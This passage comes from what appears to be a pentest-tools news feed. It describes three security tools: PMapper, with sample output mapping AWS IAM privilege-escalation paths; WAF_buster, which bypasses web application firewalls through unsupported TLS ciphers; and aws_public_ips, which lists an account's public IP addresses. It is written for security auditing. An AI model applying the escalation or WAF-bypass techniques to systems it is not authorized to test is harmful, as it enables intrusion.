access’)(3,14,’LAMBDA_CREATEFUNCTION’,’can create a Lambda function and pass an execution role to access’)(3,15,’LAMBDA_CREATEFUNCTION’,’can create a Lambda function and pass an execution role to access’)(9,10,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(4,13,’LAMBDA_CREATEFUNCTION’,’can create a Lambda function and pass an execution role to access’)(9,11,’EC2_USEPROFILE’,’can create an EC2 instance and use an existing instance profile to access’)(4,8,’STS_ASSUMEROLE’,’can use STS to assume the role’)(4,14,’LAMBDA_CREATEFUNCTION’,’can create a Lambda function and pass an execution role to access’)(4,15,’LAMBDA_CREATEFUNCTION’,’can create a Lambda function and pass an execution role to access’)(15,0,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,1,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,2,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,3,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,4,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,5,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,6,’IAM_CREATEKEY’,’can create access keys with IAM to access’)(15,7,’IAM_CREATEKEY’,’can create access keys with IAM to access’)Querying with the [email protected]:~/Documents/projects/Skywalker$ ./pmapper.py –profile skywalker query "who can do s3:GetObject with *"user/AdminUser can do s3:GetObject with *user/EC2Manager can do s3:GetObject with * through role/EC2Role-Admin user/EC2Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Adminrole/EC2Role-Admin can do s3:GetObject with *user/LambdaFullAccess can do s3:GetObject with *user/PowerUser can do s3:GetObject with *user/S3ManagementUser can do s3:GetObject with *user/S3ReadOnly can do s3:GetObject with *user/TestingSkywalker can do s3:GetObject with *role/EC2-Fleet-Manager can do s3:GetObject with * through role/EC2Role-Admin role/EC2-Fleet-Manager can create an EC2 instance and use an existing instance profile to access role/EC2Role-Adminrole/EC2Role-Admin can do s3:GetObject with *role/EC2Role-Admin can do s3:GetObject with *role/EC2WithS3ReadOnly can do s3:GetObject with *role/EMR-Service-Role can do s3:GetObject with *role/LambdaRole-S3ReadOnly can do s3:GetObject with *role/UpdateCredentials can do s3:GetObject with * through user/AdminUser role/UpdateCredentials can create access keys with IAM to access user/AdminUseruser/AdminUser can do s3:GetObject with *Identifying Potential Privilege [email protected]:~/Documents/projects/Skywalker$ ./pmapper.py –profile skywalker query "preset priv_esc user/PowerUser"Discovered a potential path to change privileges:user/PowerUser can change privileges because: user/PowerUser can access role/EC2Role-Admin because: user/PowerUser can create an EC2 instance and use an existing instance profile to access role/EC2Role-Admin and role/EC2Role-Admin can change its own privileges.Planned TODOsComplete and verify Python 3 support.Smarter control over rate of API requests (Queue, managing throttles).Better progress reporting.Validate and add more checks for obtaining credentials. Several services use service roles that grant the service permission to do an action within a user’s account. This could potentially allow a user to obtain access to additional privileges.Improving simulate calls (global conditions).Completing priv esc checks (editing attached policies, attaching to a group).Adding options for visualization (output type, edge collation).Adding more caching.Local policy evaluation?Cross-account subcommand(s).A preset to check if one principal is connected to another.Handling policies for buckets or keys with services like S3 or KMS when querying.Download PMapper

Link: http://feedproxy.google.com/~r/PentestTools/~3/Ifx-LagyHdo/pmapper-tool-for-quickly-evaluating-iam.html

WAF Buster – Disrupt WAF By Abusing SSL/TLS Ciphers

Disrupt WAF by abusing SSL/TLS CiphersAbout WAF_busterThis tool was created to Analyze the ciphers that are supported by the Web application firewall being used at the web server end. (Reference: https://0x09al.github.io/waf/bypass/ssl/2018/07/02/web-application-firewall-bypass.html) It works by first triggering SslScan to look for all the supported ciphers during SSL/TLS negotiation with the web server.After getting the text file of all the supported ciphers, then we use Curl to query web server with each and every Cipher to check which of the ciphers are unsupported by WAF and supported by Web server , if any such Cipher is found then a message is displayed that “Firewall is bypassed".ScreenshotsInstallationgit clone https://github.com/viperbluff/WAF_buster.git Python2This tool has been created using Python2 and below modules have been used throughout:-1.requests2.os3.sys4.subprocessUsage Open terminal python2 WAF_buster.py –inputDownload WAF_buster

Link: http://feedproxy.google.com/~r/PentestTools/~3/0fQO7UVapz0/waf-buster-disrupt-waf-by-abusing.html

Aws_Public_Ips – Fetch All Public IP Addresses Tied To Your AWS Account

aws_public_ips is a tool to fetch all public IP addresses (both IPv4/IPv6) associated with an AWS account.It can be used as a library and as a CLI, and supports the following AWS services (all with both Classic & VPC flavors):APIGatewayCloudFrontEC2 (and as a result: ECS, EKS, Beanstalk, Fargate, Batch, & NAT Instances)ElasticSearchELB (Classic ELB)ELBv2 (ALB/NLB)LightsailRDSRedshiftIf a service isn’t listed (S3, ElastiCache, etc) it’s most likely because it doesn’t have anything to support (i.e. it might not be deployable publicly, it might have all ip addresses resolve to global AWS infrastructure, etc).Quick startInstall the gem and run it:$ gem install aws_public_ips# Uses default ~/.aws/credentials$ aws_public_ips52.84.11.1352.84.11.832600:9000:2039:ba00:1a:cd27:1440:93a12600:9000:2039:6e00:1a:cd27:1440:93a1# With a custom profile$ AWS_PROFILE=production aws_public_ips52.84.11.159CLI reference$ aws_public_ips –helpUsage: aws_public_ips [options] -s, –services ,<s2>,<s3> List of AWS services to check. Available services: apigateway,cloudfront,ec2,elasticsearch,elb,elbv2,lightsail,rds,redshift. Defaults to all. -f, –format <format> Set output format. Available formats: json,prettyjson,text. Defaults to text. -v, –[no-]verbose Enable debug/trace output –version Print version -h, –help Show this help messageConfigurationFor authentication aws_public_ips uses the default aws-sdk-ruby configuration, meaning that the following are checked in order:Environment variables:AWS_ACCESS_KEY_IDAWS_SECRET_ACCESS_KEYAWS_REGIONAWS_PROFILEShared credentials files:~/.aws/credentials~/.aws/configInstance profile via metadata endpoint (if running on EC2, ECS, EKS, or Fargate)For more information see the AWS SDK documentation on configuration.IAM permissionsTo find the public IPs from all AWS services, the minimal policy needed by your IAM user is:{ “Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Action": [ "apigateway:GET", "cloudfront:ListDistributions", "ec2:DescribeInstances", "elasticloadbalancing:DescribeLoadBalancers", "lightsail:GetInstances", "lightsail:GetLoadBalancers", "rds:DescribeDBInstances", "redshift:DescribeClusters" ], "Resource": "*" } ]}ContactFeel free to tweet or direct message: @arkadiytDownload Aws_Public_Ips

Link: http://feedproxy.google.com/~r/PentestTools/~3/aLYdLNP_wx4/awspublicips-fetch-all-public-ip.html